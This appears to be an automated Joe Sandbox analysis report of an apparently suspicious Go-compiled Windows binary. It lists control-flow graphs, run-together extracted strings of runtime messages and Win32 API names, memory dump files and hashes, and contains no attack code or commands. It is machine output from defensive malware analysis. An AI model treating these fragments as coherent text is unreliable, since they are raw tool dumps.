                      control_flow_graph 945 687040-687049 946 68704f-687074 945->946 947 6873d5-6873e4 call 6d9860 945->947 948 687084-68708f call 6d43a0 946->948 949 687076-687082 946->949 947->945 951 687097-6870c3 call 6d43a0 948->951 949->951 957 6870c9-6870eb call 6d43a0 951->957 958 687395-6873d4 call 6c8480 951->958 963 6870f1-6871d9 call 6dc1eb call 6c8060 957->963 964 6872b5-687394 call 6dc1eb call 6c8060 957->964 973 6871df-687202 call 6821c0 963->973 974 6872a5-6872b4 963->974 977 687213-68724e call 6d44c0 * 2 973->977 978 687204-68720e 973->978 983 687269-687286 call 6c8300 977->983 984 687250-687267 call 6821c0 977->984 978->974 983->974 984->983 989 687288-6872a0 call 6c8300 984->989 989->974
                      Strings
                      • is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetP, xrefs: 006872FF
                      • is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxWCreateRectRgnDeleteServiceDestroyWindowDrawFocusRect, xrefs: 006873A4
                      • : missing method AdjustTokenGroupsAttachThreadInputCertFindExtensionChoosePixelFormatCryptDecodeObjectDeleteEnhMetaFileDnsRecordListFreeEndDeferWindowPosFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetProfileStringWGetSh, xrefs: 00687337
                      • (types from different packages)28421709430404007434844970703125CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapIter.Value called before NextWSAGetOverlappedResult not found" not supported for cpu option "end , xrefs: 00687275
                      • , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLydianMulDivRejangSCHED SaveDCStringSyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UT, xrefs: 0068717D
                      • is lr: of on pc= sp: sp=) = ) m=+Inf-Inf3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itab, xrefs: 00687152
                      • (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim, xrefs: 00687294
                      • interface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not availableprotocol not supportedremote address changedruntime.main not on m0runtime: work.nwai, xrefs: 0068711D, 006872D4, 006873B9
                      • interfaceinvalid nipv6-icmpmSpanDeadmSpanFreentdll.dllole32.dllpanicwaitpclmulqdqpreemptedpsapi.dllrecover: reflect: scavtracestackpooltracebackwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwai, xrefs: 0068707B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: (types from different packages)28421709430404007434844970703125CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapIter.Value called before NextWSAGetOverlappedResult not found" not supported for cpu option "end $ (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim$ is lr: of on pc= sp: sp=) = ) m=+Inf-Inf3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itab$ is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxWCreateRectRgnDeleteServiceDestroyWindowDrawFocusRect$ is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetP$, not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLydianMulDivRejangSCHED SaveDCStringSyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UT$: missing method AdjustTokenGroupsAttachThreadInputCertFindExtensionChoosePixelFormatCryptDecodeObjectDeleteEnhMetaFileDnsRecordListFreeEndDeferWindowPosFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetProfileStringWGetSh$interface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not availableprotocol not supportedremote address changedruntime.main not on m0runtime: work.nwai$interfaceinvalid nipv6-icmpmSpanDeadmSpanFreentdll.dllole32.dllpanicwaitpclmulqdqpreemptedpsapi.dllrecover: reflect: scavtracestackpooltracebackwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwai
                      • API String ID: 0-262327624
                      • Opcode ID: 55ed43d424edfc80cbf61a30af2e82d016667e9cdcc2799c36af5c31167fd363
                      • Instruction ID: 285345e57fd1d8747d74c04075c82333c2dd3249bbee030361fc9c225a5c68dd
                      • Opcode Fuzzy Hash: 55ed43d424edfc80cbf61a30af2e82d016667e9cdcc2799c36af5c31167fd363
                      • Instruction Fuzzy Hash: 8F91E176608BC586DBA0DB15F44039AB3A2F788B84F54812ADBCC97B19DF7DC499CB00

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 991 688820-68882c 992 688b9e-688ba5 call 6d9860 991->992 993 688832-688897 call 6cab20 call 6cb2a0 call 682320 991->993 992->991 1002 68889d-6888a9 993->1002 1003 688b75-688b9d call 6c8300 call 6b2d80 993->1003 1005 688b6d-688b70 call 6dbf80 1002->1005 1006 6888af-6888b6 1002->1006 1003->992 1005->1003 1009 6888b8-6888d6 call 6c8300 call 6b2d80 1006->1009 1010 6888db-6888e0 1006->1010 1009->1010 1013 688b65-688b68 call 6dbf80 1010->1013 1014 6888e6-6888e9 1010->1014 1013->1005 1016 688b59-688b60 call 6dc000 1014->1016 1017 6888ef-68890f 1014->1017 1016->1013 1017->1009 1020 688911-68891b 1017->1020 1020->1009 1023 68891d-688983 call 682320 1020->1023 1026 688989-688995 1023->1026 1027 688b31-688b54 call 6c8300 call 6b2d80 1023->1027 1028 6889ba-6889c0 1026->1028 1029 688997-6889b5 call 6c8300 call 6b2d80 1026->1029 1027->1016 1032 688b2c call 6dbf80 1028->1032 1033 6889c6-6889c9 1028->1033 1029->1028 1032->1027 1037 6889cf-6889e6 1033->1037 1038 688b27 call 6dc000 1033->1038 1037->1029 1042 6889e8-688b22 call 6dc1d9 call 6c8060 call 689da0 call 6b2600 1037->1042 1038->1032 1042->1038
                      Strings
                      • value method wglShareListsxadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboar, xrefs: 00688A13
                      • called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeAmbiguous alphabet.Bahia Standard TimeBeginDeferWindowPosCanadian_AboriginalChina Standard TimeCreateBrushIndirectCreateFontIndirectWCreateSymboli, xrefs: 00688AB6
                      • panicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h, xrefs: 00688999
                      • ./5<=?CLMPSUZ[\, xrefs: 00688A4B
                      • panicwrap: unexpected string after package name: reflect.Value.Slice: slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left ou, xrefs: 006888BA
                      • panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open, xrefs: 00688B36
                      • panicwrap: no ( in panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov, xrefs: 00688B7A
                      • pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetPixelGoStringGujaratiGurmukhiHiraganaIsIconicIsWindowIsZoomedJavaneseKata, xrefs: 00688AE1
                      • ), xrefs: 00688954
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeAmbiguous alphabet.Bahia Standard TimeBeginDeferWindowPosCanadian_AboriginalChina Standard TimeCreateBrushIndirectCreateFontIndirectWCreateSymboli$ pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetPixelGoStringGujaratiGurmukhiHiraganaIsIconicIsWindowIsZoomedJavaneseKata$)$./5<=?CLMPSUZ[\$panicwrap: no ( in panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov$panicwrap: no ) in reflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open$panicwrap: unexpected string after package name: reflect.Value.Slice: slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left ou$panicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h$value method wglShareListsxadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboar
                      • API String ID: 0-3803089235
                      • Opcode ID: 26427b86943f7a67fb4673a55a14dfaf6c30686a26accb598e7954edcb57feb7
                      • Instruction ID: 3b0565b28b240adc2da4c1b99842e241be14c524cb18599b009936447d8313cd
                      • Opcode Fuzzy Hash: 26427b86943f7a67fb4673a55a14dfaf6c30686a26accb598e7954edcb57feb7
                      • Instruction Fuzzy Hash: 5581AE72618BC085C7A0AB11F8413DEB7A6F789B80F84962AEACC53B59DF3CC555CB04

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1050 6d4820-6d4824 1051 6d4aab-6d4ac2 call 6d9860 1050->1051 1052 6d482a-6d483a 1050->1052 1051->1050 1054 6d483c-6d4843 1052->1054 1055 6d484e-6d4859 1052->1055 1054->1055 1057 6d4845-6d484c 1054->1057 1058 6d4861-6d4864 1057->1058 1059 6d487a 1058->1059 1060 6d4866-6d486d 1058->1060 1063 6d487c-6d4883 1059->1063 1061 6d486f-6d4876 1060->1061 1062 6d485a 1060->1062 1061->1062 1064 6d4878 1061->1064 1062->1058 1065 6d48e8-6d4932 call 68a360 call 68ee20 call 68a580 1063->1065 1066 6d4885-6d48ab call 68ee20 1063->1066 1064->1063 1081 6d4934-6d4991 call 6b4520 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4e20 call 6b45a0 1065->1081 1082 6d4993-6d499c 1065->1082 1071 6d48ad-6d48ce 1066->1071 1072 6d48de-6d48e7 1066->1072 1074 6d4a25-6d4aaa call 6b4520 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4780 call 6b45a0 call 6b2d80 1071->1074 1075 6d48d4-6d48dd 1071->1075 1074->1051 1112 6d4a0b-6d4a0e 1081->1112 1114 6d499d-6d4a04 call 6b4520 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4780 call 6b45a0 1112->1114 1115 6d4a10-6d4a20 call 6b2d80 1112->1115 1114->1112 1115->1074
                      Strings
                      • out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateSe, xrefs: 006D4A51
                      • types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: pdh.dllrunningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 48828125, xrefs: 006D49BF
                      • - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmaftpgc gp in intip4mapnilobjpc, xrefs: 006D4A6F
                      • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindowToTopCloseEnhMetaFileCoCreateInstanceCoGetClassObjectConnectNamedPipeCopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateJobObjectWCrea, xrefs: 006D4971
                      • runtime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic links35527136788005009293556213378, xrefs: 006D4A99
                      • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLy, xrefs: 006D4956
                      • runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesP has cached GC work at end of, xrefs: 006D4A10
                      • Nw, xrefs: 006D4845, 006D498A
                      • runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size because dotdotdot in async preempt to non-Go memory ,, xrefs: 006D4939, 006D4A34
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: pdh.dllrunningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 48828125$ - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmaftpgc gp in intip4mapnilobjpc$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLy$ not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindowToTopCloseEnhMetaFileCoCreateInstanceCoGetClassObjectConnectNamedPipeCopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateJobObjectWCrea$ out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateSe$runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesP has cached GC work at end of$runtime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic links35527136788005009293556213378$runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size because dotdotdot in async preempt to non-Go memory ,$Nw
                      • API String ID: 0-3396519956
                      • Opcode ID: 292bcb6a39f8128044aa6d327cd89fcba302bcbebf1ed16bceb317b64fdb5157
                      • Instruction ID: 579f9ef7e2062462ca38cc5b7a970554ab5b0c3ced011405a17b68dca1b40202
                      • Opcode Fuzzy Hash: 292bcb6a39f8128044aa6d327cd89fcba302bcbebf1ed16bceb317b64fdb5157
                      • Instruction Fuzzy Hash: A6516A32A09B40C6DA50EF55F4813AA7766FB89B80F84512AEB4C03766DF3CD985CB54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1133 6810e0-6810e9 1134 681619-681632 call 6d9860 1133->1134 1135 6810ef-68110e 1133->1135 1134->1133 1136 681116-681119 1135->1136 1138 68134d-681363 1136->1138 1139 68111f-681121 1136->1139 1142 68136e-68137d 1138->1142 1143 681365-68136c 1138->1143 1141 681420-681423 1139->1141 1144 681429-681431 1141->1144 1145 681126 1141->1145 1146 681382-681395 1143->1146 1149 681433 1144->1149 1150 681415-681418 1144->1150 1151 68112d-681130 1145->1151 1147 681404-68140a 1146->1147 1148 681397-681399 1146->1148 1152 68137e 1147->1152 1153 681410 1147->1153 1154 68139b-6813a0 1148->1154 1155 681402 1148->1155 1149->1151 1150->1141 1156 681140-681143 1151->1156 1157 681132-68113a 1151->1157 1152->1146 1153->1142 1154->1155 1158 6813a2-681400 call 6b4520 call 6b4e20 * 3 call 6b45a0 1154->1158 1155->1147 1160 681149-681150 1156->1160 1161 681610-681618 call 6dbf80 1156->1161 1159 68116d-681171 1157->1159 1158->1147 1162 681110-681113 1159->1162 1163 681173-681179 1159->1163 1166 681605-68160b call 6dc000 1160->1166 1167 681156-68116a 1160->1167 1161->1134 1162->1136 1163->1162 1168 68117b-681180 1163->1168 1166->1161 1167->1159 1172 681440-681443 1168->1172 1174 681449-681451 1172->1174 1175 681185 1172->1175 1178 681438-68143b 1174->1178 1179 681453 1174->1179 1177 68118c-681199 1175->1177 1181 6812f9-681348 call 6b4520 call 6b4e20 * 3 call 6b45a0 1177->1181 1182 68119f-6811a3 1177->1182 1178->1172 1179->1177 1181->1162 1185 6811a9-6811ad 1182->1185 1186 6815f2-681600 call 6dbf80 1182->1186 1190 6811b3-6811cf 1185->1190 1191 6815e5-6815ed call 6dc000 1185->1191 1186->1166 1195 6815dc-6815e0 call 6dc000 1190->1195 1196 6811d5-681205 1190->1196 1191->1186 1195->1191 1200 681220-681224 1196->1200 1201 681207-681212 1196->1201 1204 68128c-6812f4 call 6b4520 call 6b4e20 * 5 call 6b45a0 1200->1204 1206 681226-681231 1200->1206 1201->1204 1205 681214-681218 1201->1205 1204->1162 1209 681243-68124b 1205->1209 1206->1204 1210 681233-68123d 1206->1210 1214 68124d-681258 1209->1214 1215 681274-681287 1209->1215 1210->1204 1213 68123f 1210->1213 1213->1209 1214->1215 1216 68125a-681264 1214->1216 1217 681460-681463 1215->1217 1216->1215 1220 681266-68126f 1216->1220 1223 681469-681483 1217->1223 1224 681530-681575 call 6b4520 call 6b4e20 * 3 call 6b45a0 1217->1224 1225 681593-681596 1220->1225 1229 681489-68149c 1223->1229 1230 681585 call 6dbf40 1223->1230 1224->1162 1225->1162 1233 68159c-6815ad 1225->1233 1235 681458-68145c 1229->1235 1236 68149e-6814b2 call 6821c0 1229->1236 1237 68158a-68158f 1230->1237 1239 6815af-6815cd 1233->1239 1240 6815d7 call 6dbf40 1233->1240 1235->1217 1248 6814dd-6814f3 1236->1248 1249 6814b4-6814d8 1236->1249 1237->1225 1239->1237 1245 6815cf-6815d2 call 6dbf40 1239->1245 1240->1195 1245->1240 1253 6814f9-681514 1248->1253 1254 681580 call 6dbf40 1248->1254 1249->1235 1257 68157a-68157f call 6dbf40 1253->1257 1258 681516-68152b 1253->1258 1254->1230 1257->1254 1258->1162
                      Strings
                      • cpu., xrefs: 00681173
                      • GODEBUG: value "GdipDisposeImageGetClipboardDataGetComputerNameWGetConsoleTitleWGetConsoleWindowGetCurrentThreadGetDesktopWindowGetFullPathNameWGetGUIThreadInfoGetLogicalDrivesGetLongPathNameWGetMenuItemCountGetMenuItemInfoWGetModuleHandleWGetNamedPipeInfoGetN, xrefs: 00681291
                      • ", missing CPU supportbytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left ov, xrefs: 006813DB
                      • GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbase outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspin, xrefs: 00681308
                      • " ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxe, xrefs: 006812D4, 00681328, 00681555
                      • " not supported for cpu option "end outside usable address spacenumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt, xrefs: 006812B4
                      • GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeMiddle East Standard TimeNew Zealan, xrefs: 006813BB
                      • GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeMapIter.Key called before NextPacific Standard Time (Mexico)QueryServiceDynamicInformationSetSecurityDescriptorRMControlSetupDiCreateDeviceI, xrefs: 00681535
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
